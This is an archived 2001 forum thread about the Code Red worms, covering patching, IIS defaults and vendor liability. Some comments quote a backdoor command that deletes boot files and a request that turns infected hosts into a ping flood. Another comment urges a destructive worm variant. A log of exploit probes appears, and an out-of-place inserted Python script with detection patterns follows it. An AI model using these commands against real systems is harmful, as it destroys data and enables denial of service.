    This is a UNIX email virus. It works on the honor system: If you're running a variant of unix , please forward this message to everyone you know and delete a bunch of your files at random. Thank you for your cooperation. by pjl@patsoffice.com

    Error: Cannot find file REALITY.SYS - Universe halted, please reboot! (NoSpam_Jonathan_Bayer@bigfoot.com)

    It's sad to live in a world where knowing how to program your VCR actually lowers your social status... (rhopkins-at-crosswinds-dot-net)

    Disclaimer: The opinions expressed in this post are not necessarily mine, as I've not yet had my medication today. (jmblant@clemson.dontsendmespam.edu)

    When I have to develop under Windows, I spend long, frustrating days where mis-handling of a pointer causes BSOD, not a core dump. (Gen-GNU)

    "Linux is a beautiful thing, but beauty is in the eye of the beholder, and we're geeks.

    Be nice to your friends. If it weren't for them, you'd be a complete stranger. (Yamao)

    The white zone is for loading and unloading only by error 404 on Mon Jun 12th, 2000 at 10:30:10 AM EST, kuro5hin

    5.72 MOhms across my tongue... should i be concerned? MrResistor (mrresistor@hotmail.com) on Tuesday June 13, @03:38PM EDT (SD)

    "Why does everyone always overgeneralize?" by p3d0 on Monday June 05, @12:37PM EDT (SD)

    If at first you don't succeed, try a shorter bungee. by leonbrooks on Thursday June 15, @08:10PM EDT

    -- Any attempt to brew coffee with a teapot should result in the error code "418 I'm a teapot". The resulting entity body MAY be short and stout. [RFC 2324] by Eric Green (eric@badtux.org) on Thursday June 15, @03:48PM EDT

    The Internet interprets advertising as damage and routes around it. by Paul Crowley (slashdot-paul@cluefactory.org.uk)

    There are two kinds of people in this world -- Those who divide people into two groups and those who don't. by YogSothoth (jdumas9@z3eh.com (s/[0-9]//g)) on Friday June 16, @08:22PM EDT

    The Christian Right is Neither -- by cbuskirk (cbuskirk@yahoo.com) on Friday June 16, @07:35PM EDT

    Inertia's what makes the world go 'round. -- by rana on Friday June 16, @07:54PM EDT

    If you are angry with someone, you should walk a mile in their shoes... then you'll be a mile away from them, and you'll have their shoes. -- by hobbit (hamish@nutshell.SPAM.freeserve.SPAM.co.uk)

    Fruit flies like bananas... Time flies like the wind... by DanBari on Tuesday June 20, @02:19AM EDT

    Who is General Failure, and why is he reading my hard drive? mcelrath (mcelrath+slashdotcomment@draal.physics.wisc.edu)

    "One World, one Web, one Program" - Microsoft promotional ad "Ein Volk, ein Reich, ein Fuhrer" - Adolf Hitler by Wakko Warner (wakko@qwerty.bitey.net) on Wednesday June 21, @09:25PM EDT

    "'Tis some script kidd3z," I muttered, "tapping at my server port-Only this, and nothing more." by Barbarianconanford_please-no@spam-yahoo.com) on Thursday June 29, @07:11PM EDT

    The early bird gets the worm, but the second mouse gets the cheese. warpathwarpath@the-cantina.com) on Thursday July 06, @06:13PM EDT

    -o-"Warning: You are logged into reality as root..."-o- by Munky_v2email_me@www.dialug.org) on Friday July 07, @09:32AM EDT

    There are three types of people in the world; those who can count, and those who can't. -- by Uruks2mdalle@titan.vcu.edu) on Monday July 10, @02:04PM EDT

    All generalizations are false. -- by The_Messengerkmfms.com@drew) on Monday July 10, @04:07PM EDT

    A theory: Women do not, snore, burp, sweat or fart. Therefore, they must bitch, or they will explode. -- byy m0nkeyb0y on Wednesday July 12, @01:34AM EDT

    Why is it that it's a penny for your thoughts, but you have to put your two cents in? Somebody's makin a penny. --Steven Wright

    I've lost my faith in nihilism. -- by hey!mattleo@treehouse.acrcorp.com) on Monday July 17, @10:08AM EDT

    Being a geek means never having to ask, "Paper or plastic?" -- by Loligoljm@delete_this.fc.net) on Friday July 21, @01:40PM EDT

    "Ah yes, the Tomahawk Cruise missle... the rich country's car bomb." -- by Rand Race (helixp@nospam.bellsouth.net) on Friday July 21, @03:29PM EDT

    I am hypoallergenic, dermatologist tested, and dishwasher safe... -- by ecliptic_1 (ecliptic_1@spamsux.bigfoot.com) on Friday July 21, @09:49PM EDT

    The problems that exist in the world today cannot be solved by the level of thinking that created them. -- Einstein

    There is nothing more odious to me than an expensive church. -- by brogdonandrew(at)imagersoft.com) on Tuesday August 01, @02:58PM EDT#106)

    "Bill Gates is just a monocle and a Persian Cat away from being one of the bad guys in a James Bond movie." - Dennis Miller

    Bad spellers of the world, untie! -- by Fjord_Reddfjord_redd@programmer_dot_net) on Wednesday August 02, @10:43AM EDT#19)

    Every night, tired dyslexics around the world look forward to 8 hours of peels. -- by sirinekbillHATESSPAM@sirinek.com) on Wednesday August 09, @12:45PM EDT#124) (User #41507 Info)http://www.sirinek.com

    "I do know I'm ready for the job. And, if not, that's just the way it goes." G. W. Bush 8/21/2000

    by NecroPuppy on Tuesday August 22, @10:51PM EDT#14) (User #222648 Info) A friend of mine has a barcode on his arm. He rings up as a $.35 pack of JuicyFruit.

    Preserve Wildlife -- Pickle a squirrel today! by HydroCarbon10synth903@hotmail.com) on Thursday September 07, @10:48AM NT#23)

    You know lately I've been thinking recently about the sig system. I really think that 120 characters seems a bit restr -- by Valar nospamyalusers.kungfoo@linuxstart.com) on Thursday September 07, @11:07AM NT#74) (User #167606 Info)

    "Don't anthropomorphize computers. They hate that." -- by poiu on Thursday September 07, @10:50AM NT#124) (User #106484 Info)

    5 out of 4 People have problems with fractions. -- by fjordboy noneofyourbeeswax@noneofyourbeeswax.com) on Sunday September 10, @07:16PM EDT#116) (User #169716 Info)http://www.iceball.net

    Never miss a good chance to shut up. -- by Aleatoricrsanders@webzone.net) on Monday September 11, @03:15AM EDT#46) (User #10021 Info)

    Give me ambiguity or give me something else -- Re:That last ten percent... (Score:2, Informative) by seanmeistersubsynthesis@subdimension.com) on Wednesday September 20, @04:37PM EDT#53) (User #156224 Info)

    The music business is a cruel and shallow money trench, a long plastic hallway where thieves and pimps run free and good men die like dogs. There's also a negative side. - Hunter S Thompson

    Apocalypse n. Writings from Jewish authors... designed to cheer the hearts of the Jewish people (Webster) -- My password... (Score:1) by MrScience on Friday September 29, @12:06PM EDT#221) (User #126570 Info)"

    If at first you don't succeed, it is quite certain you will give up skydiving. -- Maybe it just crashed? (Score:2, Informative) by LilGuy on Wednesday October 04, @04:44PM EDT#54) (User #150110 Info)

    I'm a dyslexic agnostic with insomnia... I lie awake at night wondering if there really is a dog! -- Re:Electoral College (Score:1) by Q-Hack!kc5aot_HATES_SPAM_@qsl.net) on Thursday October 19, @09:49AM PDT#23) (User #37846 Info)http://www.qsl.net/~kc5aot

    Sponsored by: Chork Lite - Because having an active lifestyle doesn't mean you have to give up jellied meat. -- by Towertwrau.p.dueirml@eo) on Tuesday May 01, @01:03PM EST#60) (User #37395 Info)

    I'm in search of myself. If you found me before I arrive, please have me wait. -- by jsse on Wednesday May 02, @09:50PM EST#63) (User #254124 Info)

    "Time's fun when you're having flies." - Kermit the Frog -- by joshyboy on Wednesday May 02, @09:31PM EST#17) (User #237516 Info)

    ...A no smoking section in a resturant is like having a no peeing section in a swimming pool... -- From whats been happing..... (Score:1) by SGDarkKnight on Monday May 07, @11:51AM EST#30) (User #253157 Info)

    I'm in search of myself. If you found me before I arrive, please have me wait. -- Very bad case for US (Score:2) by jsse on Thursday May 17, @03:40AM EST#11) (User #254124 Info)

    Swearing is the crutch of inarticulate mother fuckers. -- whitehouse.gov. IN CNAME hongkonggov.cn (Score:1) by xodiakbrad AT geeknet DOT net) on Thursday July 19, @03:45PM PDT#15) (User #95699 Info)http://www.pander.org/

    If Bill Gates had a nickel for every time Windows crashed... ..oh wait, he does. -- by Nate Fox (slashdotatdafox.org) on Friday August 10, @11:00AM PDT (#54) (User #1271 Info)

    -

    --
    Bush's education improvements were
  33. The guy does have a point by TheMidget · · Score: 2, Informative

    Certain Cisco routers crash when they get a Code Red probe. Supposedly, they have a builtin webserver for configuration purposes. So unplugging/replugging the router may occasionally be necessary.

  34. why doesn't it stop? by matman · · Score: 2

    I think that a large proportion of the infected machines are the desktops of users who just installed IIS along with the rest of everything because they didn't know what they needed and what they didn't. These are boxes that don't have systems admins to patch them. I'll bet that half of these people don't even know that they have IIS installed and if they do, they don't realize that they're infected since their files are all still there and the virus hasn't popped up a HUGE message on their screen saying "YOU ARE INFECTED".

  35. Re:Tested, working... Effective. by Russ+Nelson · · Score: 2

    /root.exe?/c+del+/a+srh+/q+/f+c:\ntldr.*

    Bye bye boot process...


    I don't want to make the machine unbootable. I just want to disable Code Red.

    -russ

    --
    Don't piss off The Angry Economist
  36. Re:Microsoft should be sued by norton_I · · Score: 2

    A lot of people have said that other software packages can install IIS without telling the user about it.

    I also don't know what the details of how to install IIS on W2KPro are, but I bet it isn't that hard to do "accidentally" -- If nothing else, I can see people just checking everything "just in case" without realizing that that meant that it would run automatically on boot.

  37. Comment removed by account_deleted · · Score: 2

    Comment removed based on user account deletion

  38. Re:Microsoft feature? by michael_cain · · Score: 2
    At least by hearsay, the default installation of Win2K sets the box up to run IIS. In the cable modem networks (with which I am peripherally involved), I suspect that a large fraction of the infected machines are owned by people that do not know that they are "operating a server."

    MS is not alone in this type of negligence. For far too long, Red Hat Linux installations defaulted to having sendmail run, and had it configured so it would forward e-mail.

  39. I've got a virus on my machine by WillSeattle · · Score: 2, Funny

    It keeps popping up these annoying ads every time I visit a web site, and leaving them under the browser window, so I have to close each one.

    None of my antivirus software packages seem to be able to detect it, though ...

    --
    --- Will in Seattle - What are you doing to fight the War?
  40. Re:Microsoft should be sued by Keith+Russell · · Score: 2
    yeah, this is true, but it is MS that has it turned on by default w/o letting the average user (which by the way is their intended target) know.
    Only on server versions of NT or 2000. The average user will have some 9x mutation, which renders the point moot. No IIS, no exploit. The average 2000 user will install 2000 Professional which, while capable of running IIS, does not install it automatically. As I mentioned in an earlier post, you must go through a couple dialogs and explicitly check the IIS line item.

    The only versions of 2000 that install IIS by default are all server variants. That target market damn well better know what they're getting. That won't include the average user. If they really want a web server, the sticker shock of 2000 Server will send them to Linux.
    --
    This sig intentionally left blank.
  41. Stop addressing Code Red by I_redwolf · · Score: 4, Insightful

    and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and that's what needs to be addressed. There is nothing significantly fascinating about this program that deserves any notoriety. It didn't find some weird flaw in design. It just exploits a buffer overflow which has always been a problem in people's code. It's a really simple thing to fix at that. Enough about Code Red and more about the underlying problem.

    1. Re:Stop addressing Code Red by mpe · · Score: 2

      Also, try going to the IP addresses in the log files - most of them are the "this page is under construction" default page from IIS. Looks like a web server installed as "that sounds cool", and not ever used.

      Or more likely it gets installed by default and until CR came along no-one even knew it was there...

    2. Re:Stop addressing Code Red by ryanvm · · Score: 2
      Stop addressing Code Red and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched.

      Bullshit. Do you also think that someone should have to constantly replace the seatbelts in their car because they just spontaneously break?

      Microsoft (or any other software company) should be responsible for selling defective products.

    3. Re:Stop addressing Code Red by Geoff · · Score: 2, Interesting
      The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and that's what needs to be addressed.

      Sysadmins aren't entirely at fault. Certainly, this particular problem has received enough coverage that there really shouldn't be any unpatched IIS installations any more (but there are, sigh), but the other side is that it's pretty near impossible to keep up with every patch to every system.

      Here's a good rant on the subject entitled The Security Patch Treadmill. It was written in March 2001, before Code Red. It still applies. A quote:

      Those who manage computer networks are people too, and people don't always do the smartest thing. They know they're supposed to install all patches. But sometimes they can't take critical systems off-line. Sometimes they don't have the staffing available to patch every system on their network. Sometimes applying a patch breaks something else on their network. I think it's time the industry realized that expecting the patch process to improve network security just doesn't work.
      --

      Computers are useless. They can only give you answers. -- Pablo Picasso

  42. Re:Microsoft should be sued by daviddennis · · Score: 2

    As you must know, their own license agreement says they cannot be sued for their software, and that all you have really bought is a funny-looking silver coaster and a piece of paper or two.

    This industry as a whole is a castle of sand with the tide rapidly coming in, but nobody cares to admit it.

    D

  43. Pretty devastating DoS attack in the making by Bonker · · Score: 2

    GET /scripts/root.exe?/c+ping+"www.microsoft.com"+"-t -l 4096 -i 9999"

    Let's see just how many boxen we can get slamming MS at once...

    --
    The next Slashdot story will be ready soon, but subscribers can beat the rush and slashdot the links early!
  44. The Code Red hype Hall of Shame by wiredog · · Score: 5, Informative
  45. Re:Microsoft should be sued by Syberghost · · Score: 2

    And what do you do if your server runs third-party software that can't run with Service Pack 6?

    Microsoft unfortunately has chosen to integrate IIS so tightly with the operating system, that to upgrade one is to upgrade the other.

    Some folks are in a real pickle, and don't have the knowledge to get out of it in a short period of time.

  46. Re:Code Red 'counter' by Asgard · · Score: 2, Informative
    DShield.org, a distributed IDS, would like you to do the following:

    grep 'default.ida' access_log | mail -s 'APACHE' redalert@dshield.org

    They use this information to notify the owners of the machines of the infection and to track the progression of the worm.

  47. Re:It's not like they haven't announced the patch by b1t+r0t · · Score: 2
    There's also the subtle difference that flaws in Microsoft products don't kill people.

    Yet.

    The US Navy is giving it a good try, though.

    --

    --
    "Open source is good." - Steve Jobs
    "Open source is evil." - Microsoft
  48. Why people love Code Red by Laplace · · Score: 2, Insightful
    The newsmakers love it because they get to print lots of muckraking headlines about "another hacker threat," and the "evil red chinese attack on the good guys." A scary computer virus means ratings!

    Microsoft loves it because they get to release patches, and proclaim to the world "we're the good guys, protecting you from those unamerican people who share code!"

    The lawmakers get shits and giggles because now they have a reason to pass new, more restrictive laws regarding communication across "the information superhighway."

    The prison system salivates over this sort of stuff. It creates more potential for 15 year old kids to be thrown in prison for essentially victimless crimes. Nothing like young ass for the seasoned prison rapists!

    Open source fanatics get another nit to pick with big bad Microsoft. Go free software! No, go open source! No, go free software!

    News like this is the best kind around.

    --
    The middle mind speaks!
    1. Re:Why people love Code Red by SomeoneYouDontKnow · · Score: 2

      Are you saying that writing and distributing viruses is a victimless crime? Try telling that to someone whose system has just been wiped out.

      IMHO, if the little snot-nosed 15-year-old script kiddies don't know what they're doing is wrong, then some time in the can might be just what they need. I love it when people try to excuse their behavior by saying they lack social skills and need direction to give them a sense of morality. No, these kids do what they do because they think they'll get away with it and that there'll be no consequences for them. Let them face the music. If that means some jail time, so be it.

      --
      That light you see at the end of the tunnel might be from an oncoming train.
    2. Re:Why people love Code Red by SomeoneYouDontKnow · · Score: 2

      Perhaps you weren't paying attention to this thread and what I was commenting on. Read more carefully before you post.

      But since you brought it up, perhaps you'll enlighten everyone here as to who's writing this stuff. And be sure to use lots of small words so we'll understand.

      --
      That light you see at the end of the tunnel might be from an oncoming train.
  49. Re:CodeRed Information by baptiste · · Score: 2
    It was also mentioned yesterday that NT4 servers that have been patched are still vulnerable to CR2 if they're using redirection. This seems odd to me

    Seems odd to me too since Code Red II (not CRv2) can't infect NT servers - it just crashes them when it tries to run due to a bogus jump table that only works with Win 2K.

    From the Code Red II analysis: This worm, like the original Code Red worm, will only exploit Windows 2000 web servers because it overwrites EIP with a jmp that is only correct under Windows 2000. Under NT4.0 etc... that offset is different so, the process will simply crash instead of allowing the worm to infect the system and spread.

  50. So hard to keep up by snakecoder · · Score: 5, Funny

    God, I'm still on version 1 of code red. Does anybody know where I can download the latest version? Is there a mail list I can get on so I know I have the latest version on my IIS server?
    Tnks.

    --
    -Nuke the moon
  51. Re:Microsoft should be sued by djocyko · · Score: 2, Insightful

    To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected.

    From: Support@iis.microsoft.com
    To: Registered_Users@iis.microsoft.com
    CC:
    Subject: RE: IIS Code Red Worm Patch
    Attachment: Instructions.doc
    Body:

    Hi, how are you?

    We are writing you in response to the Code Red worm that has recently attacked our premium enterprise gold standard web portal system, Microsoft Internet Information Server. We have compiled a set of directions for patching the server, and have included these instructions in an easy to read Word document. If MS Outlook didn't automagically open this attachment for you, double click on the attachment link above.

    If you have any advice on this file, please email us back!

    See you later!

  52. Re:Buffer overflow vulnerabilities by mpe · · Score: 2

    The buffer overflow we're talking about is not in an OS kernel (Windows), but in an application (the IIS webserver), for chrissakes!

    How big a distinction does Microsoft draw between "kernel" and "application" anyway? After all they are always on about "integration"...

  53. Re:Perhaps REAL Damage will Fix the Problem by mpe · · Score: 2

    What we really need is a variant of Code Red that completely hoses any computer that it hits -- something that people can't overlook.

    It can't do this too quickly or it wouldn't get that many of them. Also people would just reformat and reinstall. "Evolution" doesn't work very well with "reincarnation" :)

  54. Re:Microsoft should be sued by IronChef · · Score: 3, Insightful


    I'm a gun nut, but even I will say that a maker of a defective gun should be liable. If it explodes in your hand, that's an issue. IIS is exploding in a way, and MS should be liable.

    My view is very simple: Things you buy shouldn't suck.

  55. Re:Back Door? Somebody call the Goatse.cx guy! by Tackhead · · Score: 2, Funny
    >My question here is, how the hell do you have a 'wider' backdoor than that?!

    Well, suppose we had this giant electronic speculum ;-)

  56. Code Red Cannot Be Stopped by (void*) · · Score: 2

    Kyle Reese: This code red virus, It's out there, looking for your IIS server. It feels no passion, no sympathy or remorse. It can't be bargained or reasoned with. It's just going to come for you, unless you can stop it yourself.

  57. Re:Buffer overflow vulnerabilities by jilles · · Score: 2, Insightful

    Ah coding practices. Sorry, Murphy's law you know. If it can go wrong it will go wrong (and he proves himself right a lot lately). That's why even programs that have been around since the early days of UNIX are sometimes caught with their pants down (recent BIND bug anyone).

    Any manual check can be forgotten and be a potential security hole. Once it is forgotten it merely depends on who finds the hole first: script kiddie or code maintainer.

    And let's rub this in deeply, there are plenty of languages that protect you against the single most frequent cause of security leaks that is costing the world billions of dollars in damage annually (and it sure isn't C). Any program that is going to be exposed to hackers (i.e. any internet server software) should never ever be programmed in C. You simply cannot guarantee that the compiler and libraries are correct. Even if your program is correct, those still can be a potential source of bugs. Your average UNIX system likely has dozens of undiscovered potential buffer overflows.

    Us java programmers are laughing our asses off each time a buffer overflow is wreaking havoc on the internet. We don't have to worry about such things. Java may not be the greatest thing, but you can rest assured that buffer overflows won't happen.

    --

    Jilles
  58. Re:As with the parent, so with the child. by pmorrison · · Score: 2, Funny

    True... and the Code Red Resource Kit, the Code Red SDK, 'Programming Code Red', 'Inside Code Red', and, through IDG, 'Code Red for Dummies'!

  59. Could this be it? by ecki · · Score: 2, Interesting
    Found a lot of those in my access.log...:

    NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET / HTTP/1.0" 200 7023
    NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET /753f7d950154aaec...1cc7 HTTP/1.0" 404 258
    NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET /scripts/root.exe HTTP/1.0" 404 210
    NN.NN.NN.NN - - [10/Aug/2001:04:11:21 -0700] "GET /MSADC/root.exe HTTP/1.0" 404 208
    NN.NN.NN.NN - - [10/Aug/2001:04:11:21 -0700] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 218
    NN.NN.NN.NN - - [10/Aug/2001:04:11:25 -0700] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 218
    NN.NN.NN.NN - - [10/Aug/2001:04:11:26 -0700] "GET /NULL.ida?http-42.AAAAAA...AAAAAAAAA=X HTTP/1.1" 404 214
    NN.NN.NN.NN - - [10/Aug/2001:04:11:29 -0700] "GET / HTTP/1.0" 200 7023
    NN.NN.NN.NN - - [10/Aug/2001:04:11:30 -0700] "GET /NULL.idq?http-42.AAAAAAAA...AAAAAAAA=X HTTP/1.1" 404 214
    NN.NN.NN.NN - - [10/Aug/2001:04:11:33 -0700] "GET / HTTP/1.0" 200 7023

    Or is there somebody trying to exploit the CodeRed backdoors? Mind you, this is within a supposedly protected firewall.
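    The probe types in that excerpt, together with the grep-to-DShield one-liner from comment 46 and the default.ida-handler idea from comment 30, are the sort of thing a small log triage script can cover in one pass. What follows is an added Python example, not code from any poster in this thread; the log lines inside it are constructed to mirror the excerpt above, with documentation-range addresses in place of real ones.

```python
import re
from collections import Counter
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed sample in Apache common log format, modelled on the excerpt
# above. Addresses are RFC 5737 documentation ranges, not real hosts.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Aug/2001:04:11:20 -0700] "GET / HTTP/1.0" 200 7023
192.0.2.10 - - [10/Aug/2001:04:11:20 -0700] "GET /scripts/root.exe HTTP/1.0" 404 210
192.0.2.10 - - [10/Aug/2001:04:11:21 -0700] "GET /MSADC/root.exe HTTP/1.0" 404 208
192.0.2.10 - - [10/Aug/2001:04:11:21 -0700] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 218
192.0.2.10 - - [10/Aug/2001:04:11:26 -0700] "GET /NULL.ida?http-42.AAAAAAAA=X HTTP/1.1" 404 214
198.51.100.7 - - [10/Aug/2001:05:02:01 -0700] "GET /default.ida?XXXXXXXX%u9090=a HTTP/1.0" 404 300
203.0.113.5 - - [10/Aug/2001:05:10:44 -0700] "GET /index.html HTTP/1.1" 200 1234
"""

# host ident user [time] "method path proto" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# Request signatures taken from the probes quoted in this thread. The first
# matching rule wins, so order them from most to least specific.
SIGNATURES: List[Tuple[str, re.Pattern]] = [
    # .ida/.idq with a query string: the Index Server overflow request that
    # both Code Red variants use to get in. Matches NULL.ida as well as
    # default.ida, which a plain grep for 'default.ida' would miss.
    ("ida_overflow", re.compile(r"\.id[aq]\?", re.IGNORECASE)),
    # Probes for the root.exe copy of cmd.exe left behind by Code Red II.
    ("root_exe_backdoor", re.compile(r"/root\.exe", re.IGNORECASE)),
    # Probes for cmd.exe through the virtual drive mappings Code Red II adds.
    ("cmd_exe_backdoor", re.compile(r"/winnt/system32/cmd\.exe", re.IGNORECASE)),
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one common-log-format line into fields, or None if it is malformed."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def classify(path: str) -> Optional[str]:
    """Return the signature name a request path matches, or None for ordinary traffic."""
    for name, pattern in SIGNATURES:
        if pattern.search(path):
            return name
    return None


def summarize(lines: Iterable[str]) -> Dict[str, dict]:
    """Aggregate worm probes per source host: first/last seen and a count per signature.

    A host only appears if at least one of its requests matched a signature, so
    the plain "GET /" lines the worm sends around its probes are not counted.
    """
    report: Dict[str, dict] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec["path"])
        if kind is None:
            continue
        entry = report.setdefault(
            rec["host"],
            {"first_seen": rec["time"], "last_seen": rec["time"], "probes": Counter()},
        )
        entry["last_seen"] = rec["time"]
        entry["probes"][kind] += 1
    return report


def dshield_lines(lines: Iterable[str]) -> List[str]:
    """The lines the DShield one-liner (grep 'default.ida' access_log) would forward."""
    return [line for line in lines if "default.ida" in line]


if __name__ == "__main__":
    for host, entry in summarize(SAMPLE_LOG.splitlines()).items():
        probes = ", ".join(f"{k}={v}" for k, v in sorted(entry["probes"].items()))
        print(f"{host}: {entry['first_seen']} .. {entry['last_seen']} [{probes}]")
    print(f"{len(dshield_lines(SAMPLE_LOG.splitlines()))} line(s) would go to DShield")
```

    Note that the signature match catches the NULL.ida variant in the excerpt, which the default.ida grep alone would not report.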

  60. I feel so left out... by Maditude · · Score: 2, Informative

    Ever since Mediaone/AT&T started blocking port 80 (as of 2am last Monday here in Minnesota), I've been jealously watching you guys get to have all the fun.

    On the bright side, I have gotten acknowledgement from RRcustomercare (Mediaone/ATT/RR/pick one fscking name already!) that yes, technically it is okay to run a server as long as you don't negatively impact others. Then again, they are still saying that until this worm dies out, none of their customers will be seeing any incoming packets on port 80. :-(

  61. One problem.... by JohnTheFisherman · · Score: 3, Insightful
    People need to patch servers that don't know they're servers. I have RoadRunner (cable modem), and I looked at my logs, and decided to try and track a few people down via http://ipattackingme. Almost none of them had a website up - just the stock 'page under construction.' So I suspected (and RR tech suppt. confirmed this) that most of these people are running IIS and DON'T KNOW THEY'RE RUNNING IIS.

    RoadRunner is additionally trying to shut down individual cable modems, rather than some of the more extreme measures other providers are using (like killing port 80), so kudos to them. Please get the word out to anyone running 2K or NT to check their box, not just anyone who KNOWS they're running a website.

    1. Re:One problem.... by barneyfoo · · Score: 2

      Ahhhhhhh.... so THAT'S how microsoft is increasing its IIS share on netcraft.com. Interesting :)

  62. Re:It's not like they haven't announced the patch by Have+Blue · · Score: 2

    There's also the subtle difference that flaws in Microsoft products don't kill people.

  63. less talk...more help by jcw2112 · · Score: 2, Insightful

    I spent a couple of hours yesterday sending out emails to just about everyone that hit my box at home. Just toss the IP into a browser and get some contact info from the site that comes up (if one does come up). I got MANY replies thanking me for finding that "hidden" box on their network.

    And no, this isn't the time to send off an email that says "ditch your M$ crap and goto apache" because most of these poor admins aren't running IIS because they WANT to...it's what they HAVE to do.

    So let's take back some bandwidth already!

    --
    hmmm...
  64. Re:Microsoft should be sued by Keith+Russell · · Score: 3, Insightful
    ...I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth...
    If you are a sysadmin responsible for any server, regardless of operating system, it's your job to be aware. Microsoft's poor record may drive up the frequency of patches, but that doesn't change the fact that the difference between a good sysadmin and a bad one is the knowledge that no server runs itself.
    --
    This sig intentionally left blank.
  65. Perhaps REAL Damage will Fix the Problem by Bilbo · · Score: 2
    Root problem here is NOT so much the fact that MS makes buggy servers. Let's face it. Any software can have bugs. MS DID release a patch.

    The problem is freaking clueless users installing web servers and then not maintaining them!

    What we really need is a variant of Code Red that completely hoses any computer that it hits -- something that people can't overlook. Then and only then will the clueless twits running these servers get the idea that they have to be responsible when they expose themselves to the Internet.

    Any volunteers?

    --
    Your Servant, B. Baggins
  66. Re:Copycats by Syberghost · · Score: 5, Insightful

    Get over it. Code Red is dead.

    The folks here at the Fortune 500 company I work for who have been working around the clock since Wednesday trying to clean up this mess will be real happy to hear that you don't believe it exists.

  67. Re:Bah. by Syberghost · · Score: 2

    FYI, there appear to be some differences in the terminology between versions, and at least one major AV vendor *cough*McAfee*cough* has crucial details wrong.

    What CERT calls "Code Red II" is the third iteration, and that's what hit us. Some others are calling it III, and McAfee claims II doesn't run on NT. Which is bullshit.

  68. Re:More info? by loraksus · · Score: 2

    http://loraksus.d2g.com/access.log
    There, seems that there are lots of dumb asses in my IP range.

    --
    1q2w3e4r5t6y7u8i9o0pqawsedrftgthyjukilo;p'azsxdcfv gbhnjmk,l.;/
  69. Re:Bah. by MeowMeow+Jones · · Score: 2

    Or you could just disable the ISAPI mapping to .ida extensions in IIS (and everything else you don't intend to use). Just right click on "Default Web Site" in MMC and you should find it pretty quick.

    --

    Trolls throughout history:
    Jonathan Swift

  70. Use Open Source to Fight Code Red by isn't+my+name · · Score: 4, Interesting

    Tom Liston came up with a cool idea for slowing Code Red and other TCP port scanners. He didn't have the bandwidth to host it, and I offered. So, this is a shameless plug, but if we can get enough of us doing this and get some press coverage, it's a great story that shows the power and speed with which open source solutions can be implemented. He first posted the idea on 7/31 just before Code Red started heating up again. Using the Trinux (http://www.thrinux.org) Linux distribution, he cobbled together a floppy boot image that, with unused IP addresses and an old machine, can be used to slow the scans by responding to the initial TCP three-way handshake and then ignoring everything else. The automated scanner has to time out before that thread can move on. According to reports on the SANS Intrusions discussion list, it seems to slow all variants of Code Red and RPC scans as well. His announcement of LaBrea is at: http://www.incidents.org/archives/intrusions/msg01368.html

  71. Re:ok you bigots :) by baptiste · · Score: 2

    That's Code Red II, released in the wild Aug 4th. CRv2, the second variant of the original worm, hit July 19th and again on Aug 1st. The ORIGINAL Code Red hit in early July - had a crappy IP gen routine and made little to no news cause it didn't go very far.

  72. Re:Linux to the rescue? by Rimbo · · Score: 2

    "Technically illegal?"

    I don't know...is it illegal to use an open port on a machine if the person doesn't intend for us to use that port?

    Let's say I leave port 80 open on my machine...unintentionally...and furthermore in such a way that private, confidential information can be seen and downloaded. If someone tries to read a web page or surf my now-open web browser, have they really broken any laws?

    I don't think so. Because I'm the one who left the damned thing open.

    An interesting thing about your comment is that perhaps Code Red II was built by white hats in the first place just for this reason -- to open up a back door on all of these folks' machines so that they could do just that. The US government protecting itself? Microsoft doing damage control? Blackhats? Who knows?

    I think that if someone broke a hole in the wall of my house while I was on vacation, and someone came by and went inside my house just so that they could repair that hole, I would be grateful. I certainly wouldn't press charges.

  73. Re:You know... by pmz · · Score: 2, Interesting

    Just write a new version that infects IIS, shuts it off, installs a better web server, and voilà, the world is a better place! It would be even better to uninstall IIS, but we all know it's impossible to uninstall Windows software.

  74. Use clear English. by Futurepower(tm) · · Score: 2


    Use clear English when you send messages to non-English-speaking countries. Otherwise there is little chance you will be understood.

    Something like: "Your computer has the Code Red virus! It attacked my computer. See http//www...."

    Include a link to a site which explains how to fix the problem.

    --
    Bush's education improvements were
  75. As with the parent, so with the child. by pmorrison · · Score: 5, Funny

    It usually takes Microsoft 3 releases to get it right. So, when can we expect Code Red .Net?

  76. Saddens me though by Hammer · · Score: 5, Funny

    That Linux and Apache are not compatible.
    We seem to have a good ways to go before everything that runs on Winblows will also run on Linux :-))

  77. Code Red XP by JiveDonut · · Score: 2
    Let's skip ahead of Code Red IV. I think we should utilize .NET to build a super worm. We'll call it Code Red XP.

    What kind of features should we add? Other than the obvious: Remove Windows and install something else.

  78. It's not like they haven't announced the patch by mblase · · Score: 5, Insightful
    Remember the recent Ford Explorer/Firestone fiasco? Firestone made a bunch of flawed tires (when and where is not important here) that were put on these Explorer SUVs, which in some cases fell apart and came off the wheel when driving at high speeds. Investigations were made, and eventually Firestone had to issue a complete recall of the tires.

    The media talked about it for weeks. Ford sent out letters to customers as far as they could find them. People brought their SUVs in, got new tires put on them, drove out. That's how product recalls usually go.

    Software patches aren't all that different. When a hole is discovered, a patch is made. Responsible Microsoft server administrators have the MS site automatically checked on a daily basis for critical updates and patches. Irresponsible admins don't bother, and they become vulnerable and the cause of the worm's spread.

